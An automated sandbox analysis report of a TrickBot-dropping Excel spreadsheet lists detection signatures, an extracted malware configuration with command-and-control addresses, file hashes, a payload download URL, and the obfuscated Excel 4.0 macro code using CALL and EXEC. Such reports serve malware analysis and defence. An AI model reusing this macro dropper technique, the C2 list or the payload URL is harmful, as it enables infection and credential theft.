Play interactive tourEdit tour
Analysis Report 446446.xls
Overview
General Information
Detection
Hidden Macro 4.0 TrickBot
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Trickbot
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
Threatname: Trickbot |
---|
{"ver": "2000028", "gtag": "rob52", "servs": ["89.250.208.42:449", "182.253.184.130:449", "31.211.85.110:443", "85.112.74.178:449", "102.68.17.97:443", "103.76.150.14:443", "96.9.77.142:443", "91.185.236.170:449", "87.76.1.81:449", "91.225.231.120:443", "62.213.14.166:443", "201.114.152.181:60304", "91.248.207.239:13871", "5.50.104.227:23468", "122.117.176.99:50289", "250.16.62.7:12037", "43.219.127.177:42389", "183.210.9.161:55813", "203.2.134.219:34188", "24.203.49.183:64402", "89.227.14.153:60566", "44.55.149.111:41730", "197.181.162.30:5798", "152.49.214.109:59125", "245.241.127.55:36657", "107.85.198.194:37398", "191.250.160.220:23460", "40.81.224.235:45065", "211.246.214.27:8638"], "autorun": ["pwgrab"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
|
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Unpacked PEs |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Found malware configuration | Show sources |
Source: | Malware Configuration Extractor: |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Found obfuscated Excel 4.0 Macro | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | OLE indicator, VBA macros: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Code function: | ||
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Process created: | ||
Source: | Process created: |
Stealing of Sensitive Information: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution33 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection11 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1138157 | Download File |
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
living-traditions.com | 64.207.186.30 | true | false | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
64.207.186.30 | living-traditions.com | United States | 398110 | GO-DADDY-COM-LLCUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 385552 |
Start date: | 12.04.2021 |
Start time: | 17:05:10 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 20s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | 446446.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal96.troj.expl.evad.winXLS@7/7@1/1 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
17:05:41 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
GO-DADDY-COM-LLCUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 449536 |
Entropy (8bit): | 5.5101637778448955 |
Encrypted: | false |
SSDEEP: | 6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx |
MD5: | CBEA511BD35F247E4B4BF7CC5A3A7CBD |
SHA1: | 8C0D352934271350CFE6C00B7587E8DC8D062817 |
SHA-256: | 0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8 |
SHA-512: | AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF |
Malicious: | true |
Reputation: | low |
IE Cache URL: | http://living-traditions.com/blogs/click.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 80628 |
Entropy (8bit): | 7.888145041366286 |
Encrypted: | false |
SSDEEP: | 1536:ZnC+ow5JeueA6rWGH3WdPMAeWRlMVGoIahaDHTU6hryF70Ki9h:ZnC+oQirW23WhMg2sTU2yF70KiD |
MD5: | B0C770DA6FFF46D0500CCF97D7CDA12A |
SHA1: | 664AE1F31F2012830589FD05CB8798918F6F0219 |
SHA-256: | 3BF029B9AB1A47C8BB4C5EB0DF93AC234CFF71835AA2D9E58C342F3A1BBD29BA |
SHA-512: | C1A27AAFEB6D561E23AEC2CDFE4EDD527AC92214853020F37F2F41402E1389619173FDE9B67ECD04561CF9EC7BB28E01A9A0A6302855779103CC213138CC8591 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1984 |
Entropy (8bit): | 4.464349531148646 |
Encrypted: | false |
SSDEEP: | 24:8Dnbk/XTd6jFyPDVeMsODv3qcTdM7dD2Dnbk/XTd6jFyPDVeMsODv3qcTdM7dV:8s/XT0jFwDVmlWQh2s/XT0jFwDVmlWQ/ |
MD5: | 4348595ED5C238F3A7464C51D0660C8B |
SHA1: | E63FE61EDDE7BE6C9F33EBF482C9452B52F2657F |
SHA-256: | 727289508032F34D8792E6DFD9DE538C64EEE1A0932ADB30431893A482159B92 |
SHA-512: | 67193929EBE343C53FDB503307E034CA17218201E337B5BECF8449D140FC81E065567F7641F4BFC51B35EACBBB852072B8C1A74E872EE9C997AF7C2B8A9607CB |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.473944875294604 |
Encrypted: | false |
SSDEEP: | 12:85QD7LgXg/XAlCPCHaXtB8XzB/xqvX+WnicvbIsnbDtZ3YilMMEpxRljK3wXyTdK:85w/XTd6j6vYeMsbDv3qcTrNru/ |
MD5: | 0A126F4CE8A412A7E0B56FDD34D13F90 |
SHA1: | 205C7790F9A579AD5D87877D7D4A488A388B8AA8 |
SHA-256: | 9C63D6D21963E3AD8536BC4761DC624A4D7A490F608BFE2BDE5CC491B36C3606 |
SHA-512: | B1A35E61AB7B52CFD5089807AE8B7EA604E52AFD6FE173EC324EACC8DDEC428A76ACF5024E8E41A030CAC311DBE52557D81A237DDEF72C953EE0F9C61A750386 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 71 |
Entropy (8bit): | 4.032792717761047 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMJRT30YVo730YVomMJRT30YVov:dj6J1E4B46J1E4y |
MD5: | E9BA10F8D1524D050B02A3E80256C566 |
SHA1: | 950B596DB0C42E0A9B02ACEEB0166DACB72B96AE |
SHA-256: | 8B69C0A0164EEC53F4F1BEAD5E95EBE38B27A23903D4D08570DBA040E6E93C0B |
SHA-512: | 9E626D38996BF29D3616FDCDB6CDDA07B141054294512ADA00A2E18A250F682EB34D0C3CA75796170D096183329298C695F099EAF2DB6FDA1181364033C4B3F3 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 138843 |
Entropy (8bit): | 6.821911851482883 |
Encrypted: | false |
SSDEEP: | 3072:e88rmjAItyzElBIL6lECbgBGGP5xLm7TD2jTUqyF70Ci6W2fXGUVxvfXGURH88rd:R8rmjAItyzElBIL6lECbgBvP5Nm7TUUJ |
MD5: | B68BAB90F3799DF7526E7FDF201A9D29 |
SHA1: | 50AFB3C63A6BD986AF93D8B15B8F783585FFC295 |
SHA-256: | 276BA2D933458EE7908C4B881C60C131A2CBDD8914ED4938DE68D74D10F95F78 |
SHA-512: | D9CC208214B67AF0C5A0C84EB31B9975CB85F9392E63635CBA2946F7CC6B2F9D96434A05CF0C7A5D59ED92B8D8F18474FDDA68E8D120AA8F78DAD56635ACEF31 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 449536 |
Entropy (8bit): | 5.5101637778448955 |
Encrypted: | false |
SSDEEP: | 6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx |
MD5: | CBEA511BD35F247E4B4BF7CC5A3A7CBD |
SHA1: | 8C0D352934271350CFE6C00B7587E8DC8D062817 |
SHA-256: | 0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8 |
SHA-512: | AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF |
Malicious: | true |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.2150745788685295 |
TrID: |
|
File name: | 446446.xls |
File size: | 283136 |
MD5: | 1b62b4f4b16d6219dce4c6d145c5af79 |
SHA1: | d5bc46f3043119c020ae93121195aabbf151cf75 |
SHA256: | dd3ecdcc3a6cc81ee451f90703cc899ff43c7a05b30a6538e5f3afd73f77adb1 |
SHA512: | 1a774ebb111463491f16a88b465e959c14ba32b6a399f108abe43fef66e61b663840998efdcd504306f3b28dd052032b82e8e642ffc9f9ed05186aaedbaf420e |
SSDEEP: | 6144:DcPiTQAVW/89BQnmlcGvgZ7r3J8b5I2JK+2vYft:mwt |
File Content Preview: | ........................>.......................'..........................."...#...$...%...&.................................................................................................................................................................. |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "446446.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-04-12 14:51:16 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.335261663834 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 86 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.244430475899 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . J . J . / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 270942 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 270942 |
Entropy: | 3.18416886572 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 6 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . |
Data Raw: | 09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CALL(Docs3!BX29&Docs3!BQ24&Docs3!BQ33&Docs3!BQ34,Docs3!BZ29&Docs3!CC33&Docs3!BY31&Docs3!CC35&Docs3!CC36,Docs3!CF29&Docs3!CF30,0,Docs3!BX9,Docs3!CD19,0,0)"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=Docs1!BC13()
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=EXEC(Docs3!BS36&Docs3!BS37&Docs3!CF43&Docs3!CF44&Docs3!CD19&Docs3!BZ37&Docs3!BZ39&Docs3!BZ43&Docs3!BZ44)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=Docs3!BA22(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
